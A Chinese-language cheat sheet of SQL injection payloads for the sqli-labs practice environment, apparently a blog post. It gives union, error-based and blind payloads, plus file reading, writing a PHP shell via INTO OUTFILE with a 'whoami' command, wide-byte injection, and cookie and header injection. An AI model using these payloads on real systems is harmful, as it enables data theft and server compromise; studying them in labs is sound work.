sql注入--sqli-labs-less1~9

常规注入

  1. 127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入
  2. 127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入
  3. 127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入
  4. 127.0.0.1/sqlilabs/Less-4/?id=1") and 1=2 union select 1,version(),3–+less4字符型联合注入
  5. 127.0.0.1/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x5e,version(),0x5e),1)–+less5字符型报错注入
  6. 127.0.0.1/sqlilabs/Less-6/?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)–+less6字符型报错注入
  7. 127.0.0.1/sqlilabs/Less-7/?id=1’)) union select 1,"",3 into outfile “E:\phpstudy_pro\WWW\1.php”–+less7文件上传注入,执行shell: 127.0.0.1/1.php?666=echo whoami;
  8. 127.0.0.1/sqlilabs/Less-8/?id=1’ and substr(version(),1,1)=5–+less8布尔盲注
  9. 127.0.0.1/sqlilabs/Less-9/?id=1’ and if(substr(version(),1,1)=5,sleep(5),1)–+less9时间盲注

非常规注入

  1. select File_priv from mysql.user where user=‘root’ and host=‘localhost’;–判断当前用户是否具有文件权限
    127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),load_file(“C:\Windows\System32\drivers\etc\hosts”)–+读取文件
    127.0.0.1/sqlilabs/Less-1/?id=1’and 1=2 union select 1,"",3 into outfile “E:\phpstudy_pro\WWW\2.php”–+写入文件
  2. http://127.0.0.1/sqlilabs/Less-32/?id=1%df’ and 1=2 union select 1,version(),3–+less32宽字节注入,%df+\在GBK相当于一个汉字
  3. document.cookie=“uname=Dumb’ and extractvalue(1,concat(0x7e,database(),0x7e))#” less20 Cookie 注入
  4. document.cookie=“uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSkpIw==” less22 base64注入
  5. User-Agent:hacker’ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1 less18 User-Agent 注入
  6. hacker’ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1 less19 Referer 注入

你可能感兴趣的:(Sqli注入,网络安全,网络安全)